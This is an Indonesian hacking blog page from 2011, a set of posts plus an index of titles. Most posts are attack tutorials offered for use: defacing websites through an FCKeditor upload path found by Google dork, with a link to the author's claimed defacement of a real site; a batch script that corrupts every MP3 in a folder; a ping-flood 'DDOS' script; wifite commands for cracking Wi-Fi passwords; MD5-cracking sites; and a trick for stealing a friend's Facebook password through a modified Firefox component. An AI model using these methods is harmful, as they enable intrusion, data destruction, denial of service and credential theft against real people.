Sabtu, 10 September 2011

Menjalankan .exe dengan aman

|0 komentar

Download : http://www.ziddu.com/download/9325914/Sandboxie3.2.zip.html

Jika anda menjalankan file dari sumber yang belum bisa dipercaya, coba gunakan Sandboxie. Mungkin sudah banyak yang tahu, tetapi mungkin juga berguna bagi yang belum tahu.

Program yang dijalankan tidak akan mengubah atau merusak sistem meskipun itu virus karena sandboxie menjalankannya dalam sebuah area yang terisolasi. penggunaannya pun cukup mudah. tinggal drag dan drop file.exe yang ingin dijalankan saja.

semoga berguna


  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian

Total Network Monitor - Pemantau Multi Jaringan

|0 komentar

Total Network Monitor 1.1.3
Info: www.softinventive.com
Harga: Free
OS: Win 2000/XP/Vista/7

Total Network Monitor adalah sebuah program efisiensi yang dapat Anda manfaatkan untuk mengatur dan juga memantau secara berkelanjutan terhadap jaringan komputer yang terpisah, jaringan dan sistem utilitas. Program ini akan memberitahukan Anda jika terjadi kegagalan dan kesalahan yang tak terduga.

NirLauncher - Tool serba guna

|0 komentar
NirLauncher


Info & download :
http://launcher.nirsoft.net/
System : Windows semua versi

Nirlauncher adalah kumpulan tool serbaguna yang terdiri dari password recovery, Network monitoring, web browser, programming, dan lain sebagainya. portable dan tidak membutuhkan proses instalasi.

Keunggulan
* NirLauncher dapat digunakan dari USB flash drive tanpa perlu instalasi apapun.
* NirLauncher dan semua utilitas dalam paket benar-benar freeware, tanpa ada Spyware / Adware / Malware.
* Paket NirLauncher termasuk berbagai perangkat yang mungkin Anda perlukan untuk penggunaan komputer sehari-hari Anda, termasuk utilitas untuk memulihkan password hilang, untuk memonitor jaringan, untuk melihat dan ekstrak cookies, cache, dan informasi lainnya yang disimpan oleh browser Web Anda, untuk mencari file dalam sistem Anda, dan banyak lagi ...
* Untuk setiap utilitas dalam paket, Anda dapat dengan mudah menjalankannya, melihat file bantuan, atau melompat ke halaman Web utilitas.
* Bila menggunakan dari flash drive USB, konfigurasi setiap utilitas disimpan ke dalam. Cfg file pada flash drive.
* Pada sistem x64, NirLauncher secara otomatis menjalankan versi x64 dari utilitas, bila ada versi x64 terpisah.
* NirLauncher juga memungkinkan untuk menambahkan lebih banyak paket software tambahan ke paket Nirsoft utama.

Jumat, 09 September 2011

Tool pemantau jaringan wireless

|0 komentar


tool ini berguna untuk memantau jaringan wireless di sekitar anda. dengan tool ini anda bisa mengetahui settingan sebuah SSID, mendukung GPS scanning (beberapa hardware tertentu), memantau traffic jaringan dan menemukan client yang bermasalah seperti melakukan DDOS dsb. untuk info lebioh lengkap ke tkpnya aja ya.


Httrack-3.44.1 - Tool penganalisa website

|0 komentar


HTTrack adalah sebuah tool penganalisa website gratis (GPL, gratis / free software) dan mudah untuk digunakan.

Hal ini memungkinkan Anda untuk men-download situs World Wide Web dari internet ke direktori lokal, membangun semua direktori secara rekursif, mendapatkan HTML, gambar, dan file lainnya dari server ke komputer Anda. HTTrack menyusun relatif situs asli link-struktur. Cukup membuka halaman website mirror di browser Anda, dan Anda dapat menelusuri situs dari link ke link, seperti jika Anda melihat secara online. HTTrack juga dapat mengupdate situs cermin yang ada, dan melanjutkan download terputus. HTTrack mudah diatur, dan memiliki sistem bantuan yang terintegrasi.

WinHTTrack untuk Windows 2000/XP/Vista/Seven rilis HTTrack, dan WebHTTrack Linux / Unix / BSD rilis

Kamis, 08 September 2011

deface situs web

|0 komentar
dork nya

Code:
powered by zoopeer

exploit
Code:
fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

caranya :
Buka google lalu tuliskan powered by zoopeer,
jika sudah ada target contoh :
http://target.com/

kita masukan exploitnya,yg akan kita injeksi jadi seperti ini :
Code:
http://target.com/fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

klo udah berhasil exploitnya,saatnya kita upload file deface an kita,,
udah pada tau kan ..
jika sudah upload filenya ,ganti code ini

Code:
fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

menjadi
images/File/namashell.html
hasilnya http://target.com/images/File/nama file yang kita upload.html
gampang banget kan ..

contoh hasil deface saya http://www.yazdankhodro.ir/images/File/BM-hacker.html


kumpulan situs decript md5

|0 komentar
kumpulan situs decript md5

ok cekidot

Situs-situs yang menyediakan layanan decrypt md5:
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
http://astalavista.net/index.php?
http://md5search.uk.to/
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru

Merusak File MP3 dengan Notepad

|0 komentar
File Pertama (Otak Penyerangan)
Copy Paste Text Di Bawah Ni


ID3 TENC Lavf52.16.0ÿûd ð i
¤ 4€ LAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’d¾Ã​° i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUULAME3.98.2UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUÿû’dÿ​ð i
¤ 4€ UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU​UUUUUUUUUUUUUUUUUUU ]

Save Dengan nama "Terserah.txt"

File Kedua ( Aktifator )
Copy Text Di Bawah ni:

@echo off
type "Terserah.txt" >> "*.mp3"

save dengan nama "terserah.bat"

nah setelah itu coba kalian copy (disini saya sarankan Copy) File MP3 yang akan di rusak.
lalu jalankan File "terserah.bat" tdi dalam folder yang sama dengan File mp3 tdi.
lalu jalankan dan dengarkan di bagian akhir Lagu.
ya memang bonyok tuh File MP3 nya.
Karena Dah di sisipi Script Perusak tdi. (Tutor diatas Bisa di jadikan Tutorial Untuk Membuat Virus.)

Membuat serangan DDOS dari notepad

|0 komentar
Yang di perlukan dalam pembuatan ini adalah

1.Notepad

2.salin script ini ke notepad

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3.save dengan ekstensi batchfile
contoh:DDOS.bat


Cara Pakai
silahkan silahkan otak atik sendiri


Rabu, 07 September 2011

hacking hotspot pasword

|0 komentar
hacking hotspot pasword

bicara soal hacking sepertinya tidak akan ada habisnya..
nah kali ini saya akan memberikan tutorial cara crack pasword hotspot dengan menggunakan sebuah tool

penggunaannya mudah banget seperti software2 di win***.. didesain untuk backtrack 4,

downlodnya di
#wget -O wifite.py  http://wifite.googlecode.com /svn/trunk/wifite.py

trus ketik ini
#chmod +x wifite.py

untuk jalankan nya
#python wifite.py

ini screenshot nya..




dan ini screenshot toolsnya..


silahkan coba bagi yg berminat.. dijamin ampuh..

Mengubah tampilan google dengan nama kita

|0 komentar


langsung aja masuk ke sini

1. masuk ke http://www.007google.com/create.asp
2. masukan nama anda
3. pilih mau seperti apa tampilan google anda
4. pilih CREATE MY SEARCH ENGINE

jadi kan...
jika anda menggunakan mozzila buka
tools->options->masukan ke homepage->ok
sekarang tekan ctrl+n....

jadilah....

free webhosting with cpanel

|0 komentar
langsung aja di bawah ini ada beberapa webhost free ama cpanelnya.
namanya juga free pasti ada banner N iklannya, banyak juga peraturannya makanya jangan disalahgunakan

http://www.itrello.com/provisioning/order/index.php
http://www.hostcell.net/panel/order/
http://www.qupis.com/order/
http://www.atbhost.net/ipanel/order/
http://www.thisweekinwebhosting.com/clients/order/
http://tikolah.com/billing/order/?group=2
http://www.freecchost.com/member/order/
http://www.hosthype.co.uk/billing/order/
http://signup.squareserve.com/order/
http://www.sobecknetworks.com/hosting/order/?group=1
http://www.profusehost.net/ipanel/order/...php?step=3
http://www.xlxhost.org/billing/order/
http://freehostspace.info/ipanel4/order/
http://cbc360.net/host/order/index.php
http://tikolah.com/billing/order/?group=2
http://www.420mb.com/billing/order/index.php?group=1
https://www.ihubhost.net/clients/order/
http://www.500mb.us/ipanel/order/
http://cp.proxywrek.com/order/
http://www.gothosted.org/order/order/
http://www.photonhosts.com/clients/order/?group=1
http://hosting-gratuito.org/ipanel/order/
http://client.lairspace.com/order/
http://billing.capital-hosting.co.uk/ord...=1-monthly
http://billing.post4space.com/order/
http://signup.instantfreesite.com/order/
http://xlxhost.tk/ipanelz/order/
http://tourismhost.com/billing/order/
http://www.120meg.net/ipanel/order/
http://www.montoville.com/client/order/
http://light-host.com/billing/order/
http://www.gohost.hk/panel/order/
http://thegioithitrung.com/hostpanel/order/
http://hfu.ir/panel/order/
http://www.xlxhost.org/billing/order/
http://profusehost.net/ipanel/order/
http://webz.pk/order/
http://www.hosttip.com/host/order/
http://www.bettahosting.com/ipanel/order/
http://www.sobecknetworks.com/hosting/or...hp?group=1
https://www.ihubhost.net/clients/order/?group=1
http://www.500mb.us/ipanel/order/
http://www.photonhosts.com/clients/order/?group=9
http://billing.capital-hosting.co.uk/order/

cara mendapatkan facebook teman

|0 komentar
langkah2 untuk mendapatkan FB temen...

1.download filex disini (http://www.ziddu.com/download/10806194/nsLoginManagerPrompter.zip.html))
2.abis itu extract n copy paste filex ke C:\Program Files\Mozilla
Firefox\components
3.restart browser anda..
4.biarin temen anda log in di kompi anda
5.biar bisa liat klik "tools" pada mozilla lalu "options" klik pada tab
"security"trus "save pasword" trus tinggal klik "show password"


....selamat mencoba....
--===semoga berhasil===--

mengenal botnet

|0 komentar
Apa itu Botnet??


Jika anda setiap harinya mendapatkan ratusan spam di dalam mailbox, menemukan posting penjualan
